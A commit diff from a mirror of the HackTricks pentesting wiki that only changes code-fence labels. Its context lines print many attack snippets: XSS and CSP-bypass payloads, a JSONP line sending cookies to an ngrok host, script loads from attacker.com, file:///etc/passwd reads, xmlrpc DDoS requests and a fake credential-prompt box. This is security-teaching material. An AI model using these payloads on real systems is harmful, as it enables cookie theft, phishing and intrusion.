mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
fix ````
This commit is contained in:
parent
91b488ecd9
commit
6d132e187e
@ -271,7 +271,7 @@ regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
||||
|
||||
[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||||
|
||||
```markup
|
||||
```html
|
||||
<?XML version="1.0"?>
|
||||
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
|
||||
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
|
||||
|
@ -340,7 +340,7 @@ The page [www.mail-tester.com](https://www.mail-tester.com) can indicate you if
|
||||
- Make sure you have checked "**Add Tracking Image**"
|
||||
- Write the **email template** (you can use variables like in the following example):
|
||||
|
||||
```markup
|
||||
```html
|
||||
<html>
|
||||
<head>
|
||||
<title></title>
|
||||
|
@ -27,7 +27,7 @@ Referrer-Policy: unsafe-url
|
||||
|
||||
You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
|
||||
|
||||
```markup
|
||||
```html
|
||||
<meta name="referrer" content="unsafe-url">
|
||||
<img src="https://attacker.com">
|
||||
```
|
||||
|
@ -373,7 +373,7 @@ adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?para
|
||||
|
||||
_Note that you can **omit the package name** and the mobile will automatically call the app that should open that link._
|
||||
|
||||
```markup
|
||||
```html
|
||||
<!-- Browser regular link -->
|
||||
<a href="scheme://hostname/path?param=value">Click me</a>
|
||||
<!-- fallback in your url you could try the intent url -->
|
||||
|
@ -253,7 +253,7 @@ In Android apps, **activities** are like screens, showing different parts of the
|
||||
|
||||
The **launcher activity** is the main gateway to an app, launched when you tap the app's icon. It's defined in the app's manifest file with specific MAIN and LAUNCHER intents:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<activity android:name=".LauncherActivity">
|
||||
<intent-filter>
|
||||
<action android:name="android.intent.action.MAIN" />
|
||||
|
@ -120,7 +120,7 @@ Attack Surface:
|
||||
|
||||
An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<activity android:name="com.my.app.Initial" android:exported="true">
|
||||
</activity>
|
||||
```
|
||||
@ -160,7 +160,7 @@ This post was so big to be here so **you can** [**access it in its own page here
|
||||
|
||||
A exported service is declared inside the Manifest.xml:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<service android:name=".AuthService" android:exported="true" android:process=":remote"/>
|
||||
```
|
||||
|
||||
|
@ -26,7 +26,7 @@ After adding:
|
||||
|
||||
Now go into the **res/xml** folder & create/modify a file named network_security_config.xml with the following contents:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<network-security-config>
|
||||
<base-config>
|
||||
<trust-anchors>
|
||||
|
@ -73,7 +73,7 @@ In **.Net MVC applications**, the **web.config** file plays a crucial role by sp
|
||||
|
||||
An example of accessing the **web.config** file is shown below:
|
||||
|
||||
```markup
|
||||
```html
|
||||
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
@ -96,7 +96,7 @@ Files found in the root directory, like **/global.asax** and **/connectionstring
|
||||
|
||||
MVC applications also define additional **web.config files** for specific namespaces to avoid repetitive declarations in each file, as demonstrated with a request to download another **web.config**:
|
||||
|
||||
```markup
|
||||
```html
|
||||
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
@ -105,7 +105,7 @@ Host: example-mvc-application.minded
|
||||
|
||||
The mention of a custom namespace hints at a DLL named "**WebApplication1**" present in the /bin directory. Following this, a request to download the **WebApplication1.dll** is shown:
|
||||
|
||||
```markup
|
||||
```html
|
||||
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
|
@ -127,7 +127,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
|
||||
|
||||
**Check**
|
||||
|
||||
```markup
|
||||
```html
|
||||
<methodCall>
|
||||
<methodName>system.listMethods</methodName>
|
||||
<params></params>
|
||||
@ -140,7 +140,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
|
||||
|
||||
**`wp.getUserBlogs`**, **`wp.getCategories`** or **`metaWeblog.getUsersBlogs`** are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<methodCall>
|
||||
<methodName>wp.getUsersBlogs</methodName>
|
||||
<params>
|
||||
@ -158,7 +158,7 @@ The message _"Incorrect username or password"_ inside a 200 code response should
|
||||
|
||||
Using the correct credentials you can upload a file. In the response the path will appears ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
|
||||
|
||||
```markup
|
||||
```html
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<methodCall>
|
||||
<methodName>wp.uploadFile</methodName>
|
||||
@ -201,7 +201,7 @@ This method is meant for programs and not for humans, and old, therefore it does
|
||||
If you can find the method _**pingback.ping**_ inside the list you can make the Wordpress send an arbitrary request to any host/port.\
|
||||
This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** lo **scan** some internal **network** (you can indicate any port).
|
||||
|
||||
```markup
|
||||
```html
|
||||
<methodCall>
|
||||
<methodName>pingback.ping</methodName>
|
||||
<params><param>
|
||||
@ -219,7 +219,7 @@ Take a look to the use of **`system.multicall`** in the previous section to lear
|
||||
|
||||
**DDoS**
|
||||
|
||||
```markup
|
||||
```html
|
||||
<methodCall>
|
||||
<methodName>pingback.ping</methodName>
|
||||
<params>
|
||||
|
@ -39,7 +39,7 @@ However, note that **sometimes these kinds of status codes aren't cached** so th
|
||||
|
||||
You could use [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load the script from there:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
|
||||
```
|
||||
|
||||
@ -67,7 +67,7 @@ When caching a request, be **careful with the headers you use** because some of
|
||||
A header like `X-Forwarded-For` is being reflected in the response unsanitized.\
|
||||
You can send a basic XSS payload and poison the cache so everybody that accesses the page will be XSSed:
|
||||
|
||||
```markup
|
||||
```html
|
||||
GET /en?region=uk HTTP/1.1
|
||||
Host: innocent-website.com
|
||||
X-Forwarded-Host: a."><script>alert(1)</script>"
|
||||
@ -85,7 +85,7 @@ cache-poisoning-to-dos.md
|
||||
|
||||
Cookies could also be reflected on the response of a page. If you can abuse it to cause a XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
|
||||
|
||||
```markup
|
||||
```html
|
||||
GET / HTTP/1.1
|
||||
Host: vulnerable.com
|
||||
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
|
||||
@ -115,7 +115,7 @@ cache-poisoning-via-url-discrepancies.md
|
||||
|
||||
Sometimes you will need to **exploit several unkeyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as the domain name for the redirect. You can control where the page is pointed by the redirect.
|
||||
|
||||
```markup
|
||||
```html
|
||||
GET /resources/js/tracking.js HTTP/1.1
|
||||
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
|
||||
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
|
||||
@ -126,7 +126,7 @@ X-Forwarded-Scheme: http
|
||||
|
||||
If you found that the **`X-Host`** header is being used as **domain name to load a JS resource** but the **`Vary`** header in the response is indicating **`User-Agent`**. Then, you need to find a way to exfiltrate the User-Agent of the victim and poison the cache using that user agent:
|
||||
|
||||
```markup
|
||||
```html
|
||||
GET / HTTP/1.1
|
||||
Host: vulnerbale.net
|
||||
User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
|
||||
|
@ -34,7 +34,7 @@ Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh
|
||||
|
||||
And the **source code** of the vulnerable example here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
|
||||
|
||||
```markup
|
||||
```html
|
||||
<!-- Google Research - Vue.js-->
|
||||
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
|
||||
```
|
||||
|
@ -150,7 +150,7 @@ Content-Security-Policy: script-src 'self' https://google.com https: data *;
|
||||
|
||||
Working payload:
|
||||
|
||||
```markup
|
||||
```html
|
||||
"/>'><script src=https://attacker-website.com/evil.js></script>
|
||||
"/>'><script src=data:text/javascript,alert(1337)></script>
|
||||
```
|
||||
@ -165,7 +165,7 @@ Content-Security-Policy: script-src 'self' ;
|
||||
|
||||
Working payloads:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
|
||||
<param name="AllowScriptAccess" value="always"></object>
|
||||
@ -181,7 +181,7 @@ If you can upload a JS file you can bypass this CSP:
|
||||
|
||||
Working payload:
|
||||
|
||||
```markup
|
||||
```html
|
||||
"/>'><script src="/uploads/picture.png.js"></script>
|
||||
```
|
||||
|
||||
@ -232,7 +232,7 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
|
||||
> [!NOTE]
|
||||
> The post shows that you could **load** all **libraries** from `cdn.cloudflare.com` (or any other allowed JS libraries repo), execute all added functions from each library, and check **which functions from which libraries return the `window` object**.
|
||||
|
||||
```markup
|
||||
```html
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
|
||||
<div ng-app ng-csp>
|
||||
@ -318,7 +318,7 @@ Content-Security-Policy: script-src 'self' https://www.google.com https://www.yo
|
||||
|
||||
Scenarios like this where `script-src` is set to `self` and a particular domain which is whitelisted can be bypassed using JSONP. JSONP endpoints allow insecure callback methods which allow an attacker to perform XSS, working payload:
|
||||
|
||||
```markup
|
||||
```html
|
||||
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
|
||||
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
|
||||
```
|
||||
|
@ -492,7 +492,7 @@ You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollecti
|
||||
[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.\
|
||||
In order to compile the project I needed to **add** this **dependencies** to `pom.xml`:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<dependency>
|
||||
<groupId>javax.activation</groupId>
|
||||
<artifactId>activation</artifactId>
|
||||
|
@ -61,7 +61,7 @@ javascript://whitelisted.com?%a0alert%281%29
|
||||
|
||||
## Open Redirect uploading svg files
|
||||
|
||||
```markup
|
||||
```html
|
||||
<code>
|
||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<svg
|
||||
|
@ -104,7 +104,7 @@ $(ls)
|
||||
|
||||
### Basic Tests
|
||||
|
||||
```markup
|
||||
```html
|
||||
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
|
||||
```
|
||||
|
||||
@ -151,7 +151,7 @@ javascript:alert(1)
|
||||
|
||||
### Basic Tests
|
||||
|
||||
```markup
|
||||
```html
|
||||
<!--#echo var="DATE_LOCAL" -->
|
||||
<!--#exec cmd="ls" -->
|
||||
<esi:include src=http://attacker.com/>
|
||||
@ -160,7 +160,7 @@ x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/C
|
||||
|
||||
### Polygloths
|
||||
|
||||
```markup
|
||||
```html
|
||||
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
||||
```
|
||||
|
||||
@ -172,7 +172,7 @@ The same tests used for Open Redirect can be used here.
|
||||
|
||||
### Basic Tests
|
||||
|
||||
```markup
|
||||
```html
|
||||
${{<%[%'"}}%\
|
||||
{{7*7}}
|
||||
${7*7}
|
||||
@ -191,14 +191,14 @@ ${{7*7}}
|
||||
|
||||
### Basic Tests
|
||||
|
||||
```markup
|
||||
```html
|
||||
<xsl:value-of select="system-property('xsl:version')" />
|
||||
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
||||
```
|
||||
|
||||
### Polygloths
|
||||
|
||||
```markup
|
||||
```html
|
||||
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
||||
```
|
||||
|
||||
@ -206,7 +206,7 @@ ${{7*7}}
|
||||
|
||||
### Basic Tests
|
||||
|
||||
```markup
|
||||
```html
|
||||
" onclick=alert() a="
|
||||
'"><img src=x onerror=alert(1) />
|
||||
javascript:alert()
|
||||
@ -214,7 +214,7 @@ javascript:alert()
|
||||
|
||||
### Polygloths
|
||||
|
||||
```markup
|
||||
```html
|
||||
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
|
||||
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
|
||||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||||
|
@ -43,7 +43,7 @@ If the **wildcard** is used, **messages could be sent to any domain**, and will
|
||||
As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed** (no `X-Frame-Header` protection) and that is **sending sensitive** message via **postMessage** using a **wildcard** (\*), you can **modify** the **origin** of the **iframe** and **leak** the **sensitive** message to a domain controlled by you.\
|
||||
Note that if the page can be iframed but the **targetOrigin** is **set to a URL and not to a wildcard**, this **trick won't work**.
|
||||
|
||||
```markup
|
||||
```html
|
||||
<html>
|
||||
<iframe src="https://docs.google.com/document/ID" />
|
||||
<script>
|
||||
@ -168,7 +168,7 @@ bypassing-sop-with-iframes-2.md
|
||||
In order to perform these attacks ideally you will be able to **put the victim web page** inside an `iframe`. But some headers like `X-Frame-Header` can **prevent** that **behaviour**.\
|
||||
In those scenarios you can still use a less stealthy attack. You can open a new tab to the vulnerable web application and communicate with it:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<script>
|
||||
var w=window.open("<url>")
|
||||
setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
||||
|
@ -28,7 +28,7 @@ Link between parent and child pages when prevention attribute is used:
|
||||
Create the following pages in a folder and run a web server with `python3 -m http.server`\
|
||||
Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link and note how the **original** **website** **URL** **changes**.
|
||||
|
||||
```markup:vulnerable.html
|
||||
```html:vulnerable.html
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<body>
|
||||
@ -38,7 +38,7 @@ Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link
|
||||
</html>
|
||||
```
|
||||
|
||||
```markup:malicious.html
|
||||
```html:malicious.html
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<body>
|
||||
@ -49,7 +49,7 @@ Then, **access** `http://127.0.0.1:8000/`vulnerable.html, **click** on the link
|
||||
</html>
|
||||
```
|
||||
|
||||
```markup:malicious_redir.html
|
||||
```html:malicious_redir.html
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<body>
|
||||
|
@ -156,13 +156,13 @@ Use <!--esi--> to bypass WAFs:
|
||||
|
||||
Do not confuse this with a "Local File Inclusion":
|
||||
|
||||
```markup
|
||||
```html
|
||||
<esi:include src="secret.txt">
|
||||
```
|
||||
|
||||
#### CRLF
|
||||
|
||||
```markup
|
||||
```html
|
||||
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
|
||||
```
|
||||
|
||||
|
@ -102,7 +102,7 @@ Note that when **establishing** a **websocket** connection the **cookie** is **s
|
||||
|
||||
Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<script>
|
||||
websocket = new WebSocket('wss://your-websocket-URL')
|
||||
websocket.onopen = start
|
||||
|
@ -353,7 +353,7 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
|
||||
|
||||
**In general** the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** (but not `<img`)
|
||||
|
||||
```markup
|
||||
```html
|
||||
<a href="javascript:alert(1)">
|
||||
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
|
||||
<form action="javascript:alert(1)"><button>send</button></form>
|
||||
@ -466,7 +466,7 @@ And in **meta tags**:
|
||||
|
||||
From [**here**](https://portswigger.net/research/xss-in-hidden-input-fields): You can execute an **XSS payload inside a hidden attribute**, provided you can **persuade** the **victim** into pressing the **key combination**. On Firefox Windows/Linux the key combination is **ALT+SHIFT+X** and on OS X it is **CTRL+ALT+X**. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
|
||||
|
||||
```markup
|
||||
```html
|
||||
<input type="hidden" accesskey="X" onclick="alert(1)">
|
||||
```
|
||||
|
||||
@ -545,17 +545,17 @@ This can be **abused** using:
|
||||
;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`
|
||||
```
|
||||
|
||||
```````````````javascript
|
||||
```javascript
|
||||
// This is valid JS code, because each time the function returns itself it's recalled with ``
|
||||
function loop() {
|
||||
return loop
|
||||
}
|
||||
loop``````````````
|
||||
```````````````
|
||||
loop``
|
||||
```
|
||||
|
||||
### Encoded code execution
|
||||
|
||||
```markup
|
||||
```html
|
||||
<script>\u0061lert(1)</script>
|
||||
<svg><script>alert('1')
|
||||
<svg><script>alert(1)</script></svg> <!-- The svg tags are neccesary
|
||||
@ -668,7 +668,7 @@ console.log(log)
|
||||
|
||||
**JavaScript without parentheses**
|
||||
|
||||
````javascript
|
||||
```javascript
|
||||
// By setting location
|
||||
window.location='javascript:alert\x281\x29'
|
||||
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
|
||||
@ -741,14 +741,14 @@ try{throw onerror=alert}catch{throw 1}
|
||||
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
|
||||
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
|
||||
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
|
||||
````
|
||||
```
|
||||
|
||||
- [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
|
||||
- [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
|
||||
|
||||
**Arbitrary function (alert) call**
|
||||
|
||||
````javascript
|
||||
```javascript
|
||||
//Eval like functions
|
||||
eval('ale'+'rt(1)')
|
||||
setTimeout('ale'+'rt(2)');
|
||||
@ -806,7 +806,7 @@ top['al\145rt'](1)
|
||||
top['al\x65rt'](1)
|
||||
top[8680439..toString(30)](1)
|
||||
<svg><animate onbegin=alert() attributeName=x></svg>
|
||||
````
|
||||
```
|
||||
|
||||
## **DOM vulnerabilities**
|
||||
|
||||
@ -873,7 +873,7 @@ Then, the onfocus attribute will be inserted and XSS occurs.
|
||||
|
||||
### Special combinations
|
||||
|
||||
```markup
|
||||
```html
|
||||
<iframe/src="data:text/html,<svg onload=alert(1)>">
|
||||
<input type=image src onerror="prompt(1)">
|
||||
<svg onload=alert(1)//
|
||||
@ -1480,7 +1480,7 @@ Review the list of ports banned in Chrome [**here**](https://src.chromium.org/vi
|
||||
|
||||
### Box to ask for credentials
|
||||
|
||||
```markup
|
||||
```html
|
||||
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
|
||||
```
|
||||
|
||||
@ -1527,7 +1527,7 @@ function handleResponse() {
|
||||
|
||||
### Stealing PostMessage messages
|
||||
|
||||
```markup
|
||||
```html
|
||||
<img src="https://attacker.com/?" id=message>
|
||||
<script>
|
||||
window.onmessage = function(e){
|
||||
@ -1557,7 +1557,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.
|
||||
|
||||
You can also use: [https://xsshunter.com/](https://xsshunter.com)
|
||||
|
||||
```markup
|
||||
```html
|
||||
"><img src='//domain/xss'>
|
||||
"><script src="//domain/xss.js"></script>
|
||||
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
|
||||
@ -1672,7 +1672,7 @@ Example [**writeup XSS in Amp4Email in Gmail**](https://adico.me/post/xss-in-gma
|
||||
|
||||
Upload as an image a file like the following one (from [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
|
||||
|
||||
```markup
|
||||
```html
|
||||
Content-Type: multipart/form-data; boundary=---------------------------232181429808
|
||||
Content-Length: 574
|
||||
-----------------------------232181429808
|
||||
@ -1690,13 +1690,13 @@ Content-Type: image/svg+xml
|
||||
-----------------------------232181429808--
|
||||
```
|
||||
|
||||
```markup
|
||||
```html
|
||||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||
<script type="text/javascript">alert("XSS")</script>
|
||||
</svg>
|
||||
```
|
||||
|
||||
```markup
|
||||
```html
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||
|
@ -22,7 +22,7 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
||||
|
||||
### Discovery
|
||||
|
||||
```markup
|
||||
```html
|
||||
<!-- Basic discovery, Write somthing-->
|
||||
<img src="x" onerror="document.write('test')" />
|
||||
<script>document.write(JSON.stringify(window.location))</script>
|
||||
@ -39,7 +39,7 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
||||
|
||||
Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.
|
||||
|
||||
```markup
|
||||
```html
|
||||
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
|
||||
<g>
|
||||
<foreignObject width="800" height="500">
|
||||
@ -68,7 +68,7 @@ You can find a lot **other SVG payloads** in [**https://github.com/allanlw/svg-c
|
||||
|
||||
### Path disclosure
|
||||
|
||||
```markup
|
||||
```html
|
||||
<!-- If the bot is accessing a file:// path, you will discover the internal path
|
||||
if not, you will at least have wich path the bot is accessing -->
|
||||
<img src="x" onerror="document.write(window.location)" />
|
||||
@ -79,7 +79,7 @@ if not, you will at least have wich path the bot is accessing -->
|
||||
|
||||
The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.
|
||||
|
||||
```markup
|
||||
```html
|
||||
<script src="http://attacker.com/myscripts.js"></script>
|
||||
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
|
||||
```
|
||||
@ -91,7 +91,7 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
|
||||
>
|
||||
> If SSRF is allowed, but you **cannot reach** an interesting domain or IP, [check this page for potential bypasses](../ssrf-server-side-request-forgery/url-format-bypass.md).
|
||||
|
||||
```markup
|
||||
```html
|
||||
<script>
|
||||
x=new XMLHttpRequest;
|
||||
x.onload=function(){document.write(btoa(this.responseText))};
|
||||
@ -99,7 +99,7 @@ x.open("GET","file:///etc/passwd");x.send();
|
||||
</script>
|
||||
```
|
||||
|
||||
```markup
|
||||
```html
|
||||
<script>
|
||||
xhzeem = new XMLHttpRequest();
|
||||
xhzeem.onload = function(){document.write(this.responseText);}
|
||||
@ -109,7 +109,7 @@ x.open("GET","file:///etc/passwd");x.send();
|
||||
</script>
|
||||
```
|
||||
|
||||
```markup
|
||||
```html
|
||||
<iframe src=file:///etc/passwd></iframe>
|
||||
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
|
||||
<link rel=attachment href="file:///root/secret.txt">
|
||||
@ -121,13 +121,13 @@ x.open("GET","file:///etc/passwd");x.send();
|
||||
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
|
||||
```
|
||||
|
||||
```markup
|
||||
```html
|
||||
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
|
||||
```
|
||||
|
||||
### Bot delay
|
||||
|
||||
```markup
|
||||
```html
|
||||
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
|
||||
<script>
|
||||
let time = 500;
|
||||
@ -142,7 +142,7 @@ x.open("GET","file:///etc/passwd");x.send();
|
||||
|
||||
### Port Scan
|
||||
|
||||
```markup
|
||||
```html
|
||||
<!--Scan local port and receive a ping indicating which ones are found-->
|
||||
<script>
|
||||
const checkPort = (port) => {
|
||||
|
@ -27,7 +27,7 @@ Referrer-Policy: unsafe-url
|
||||
|
||||
You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
|
||||
|
||||
```markup
|
||||
```html
|
||||
<meta name="referrer" content="unsafe-url">
|
||||
<img src="https://attacker.com">
|
||||
```
|
||||
|
@ -8,7 +8,7 @@ For a comprehensive understanding of wix MSI usage examples, it is advisable to
|
||||
|
||||
The aim is to generate an MSI that will execute the lnk file. In order to achieve this, the following XML code could be employed ([xml from here](https://0xrick.github.io/hack-the-box/ethereal/index.html#Creating-Malicious-msi-and-getting-root)):
|
||||
|
||||
```markup
|
||||
```html
|
||||
<?xml version="1.0"?>
|
||||
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
|
||||
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
|
||||
|
Loading…
x
Reference in New Issue
Block a user